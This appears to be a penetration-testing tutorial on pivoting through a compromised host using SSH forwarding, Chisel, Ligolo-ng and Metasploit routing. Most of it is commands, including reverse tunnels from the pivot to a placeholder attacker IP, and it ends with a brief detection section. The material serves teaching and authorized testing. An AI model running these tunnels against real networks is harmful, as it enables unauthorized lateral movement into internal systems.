Pivoting is the technique of using a compromised host as a relay to attack additional systems in network segments that aren’t directly accessible from your attack machine. It’s a critical skill in penetration testing — most real networks have segmentation, and gaining access to the DMZ is rarely the final objective. This guide covers the most practical pivoting and tunneling tools used in modern pentests.
Conceptual Overview
Imagine this network layout:
Attack Box → [Internet] → DMZ Host (10.10.10.5) → [Internal Network] → 192.168.1.0/24
Your attack box can reach the DMZ host, but not the internal 192.168.1.0/24 range directly. Once you compromise 10.10.10.5, you need to pivot through it to reach internal targets.
Method 1: SSH Port Forwarding
SSH provides three types of port forwarding, all useful in different scenarios.
Local Port Forwarding
Forward a local port to a remote service through the pivot host:
# Access 192.168.1.10:3389 (RDP) via your local port 3389
ssh -L 3389:192.168.1.10:3389 user@10.10.10.5
# Then connect RDP to localhost:3389
xfreerdp /v:localhost:3389 /u:admin /p:password
Dynamic Port Forwarding (SOCKS Proxy)
Create a SOCKS5 proxy through the SSH connection — routes all traffic through the pivot:
ssh -D 1080 user@10.10.10.5 -N -f
Configure tools to use the proxy:
# ProxyChains config (/etc/proxychains4.conf)
socks5 127.0.0.1 1080
# Run tools through it
proxychains nmap -sV 192.168.1.0/24
proxychains curl http://192.168.1.10/
proxychains crackmapexec smb 192.168.1.0/24
Remote Port Forwarding
Expose an internal service to your attack box when the pivot can’t accept incoming connections:
# On the pivot host, forward its local port 80 to your machine
ssh -R 8080:localhost:80 attacker@YOUR_IP
Method 2: Chisel — Firewall-Friendly Tunneling
Chisel creates TCP/UDP tunnels over HTTP, making it ideal when only outbound web traffic is allowed. It’s statically compiled, requiring no dependencies on the target.
# Download on attack machine
wget https://github.com/jpillora/chisel/releases/latest/download/chisel_linux_amd64.gz
gunzip chisel_linux_amd64.gz && chmod +x chisel_linux_amd64 && mv chisel_linux_amd64 /opt/chisel
# Transfer chisel to pivot host
scp /opt/chisel user@10.10.10.5:/tmp/chisel
SOCKS proxy via Chisel:
# On attack machine — start server
./chisel server --reverse --port 8888
# On pivot host — connect back and create SOCKS proxy
./chisel client YOUR_ATTACK_IP:8888 R:socks
This creates a SOCKS5 proxy on your attack machine at 127.0.0.1:1080. Route all traffic through proxychains.
Forward a specific port:
# Attack machine (server)
./chisel server --reverse --port 8888
# Pivot (client) — forward internal RDP
./chisel client YOUR_IP:8888 R:3389:192.168.1.10:3389
Method 3: Ligolo-ng — Advanced Transparent Tunneling
Ligolo-ng is a modern tunneling tool that creates a full network interface on your attack machine, making pivoting completely transparent — no need for proxychains.
# Download agent and proxy
wget https://github.com/nicocha30/ligolo-ng/releases/latest/download/ligolo-ng_agent_linux_amd64.tar.gz
wget https://github.com/nicocha30/ligolo-ng/releases/latest/download/ligolo-ng_proxy_linux_amd64.tar.gz
# On attack machine — start proxy
sudo ./proxy -selfcert -laddr 0.0.0.0:11601
# Transfer agent to pivot and run
./agent -connect YOUR_IP:11601 -ignore-cert
In the Ligolo proxy console:
ligolo-ng » session # Select the agent session
ligolo-ng » tunnel_start # Start the tunnel
# Add route to internal network
sudo ip route add 192.168.1.0/24 dev ligolo
Now you can communicate with 192.168.1.0/24 directly from your attack box without proxychains — nmap, metasploit, burpsuite all work natively.
If you have a Meterpreter session, use Metasploit’s built-in routing:
meterpreter > run autoroute -s 192.168.1.0/24
meterpreter > background
msf > use auxiliary/server/socks_proxy
msf > set SRVPORT 1080
msf > set VERSION 5
msf > run -j
# Now use proxychains
proxychains nmap -sV 192.168.1.10
Multi-Hop Pivoting
In segmented networks, you may need to pivot through multiple hosts:
Attack → Host A (10.10.10.5) → Host B (192.168.1.5) → Internal (172.16.0.0/24)
With Chisel, chain pivots:
# On attack: server
./chisel server --reverse --port 8888
# On Host A: connect to attack, open port 9000 for Host B
./chisel client ATTACK_IP:8888 R:9000:0.0.0.0:9000 R:socks
# On Host B: connect through Host A (via Host A's local port 9000)
./chisel client HOST_A_IP:9000 R:socks
Detection Considerations
When testing your own network, pivoting tools leave traces:
- SSH tunnels appear in
/var/log/auth.log and SSH audit logs
- Chisel/Ligolo traffic looks like normal HTTPS but may have unusual destination IPs
- Metasploit routing leaves entries in process memory and netstat
Monitor outbound connections from internal hosts that typically don’t make external connections.
Practice Resources
- HackTheBox Pro Labs (Offshore, RastaLabs) — multi-network environments
- TryHackMe: Wreath — hands-on pivoting network
- VulnHub: Kioptrix series — simple pivoting scenarios
- SANS SEC560 course covers pivoting extensively
Pivoting mastery separates intermediate from advanced pentesters. The ability to move through network segments quietly and efficiently is essential for OSCP, CRTO, and real-world red team engagements.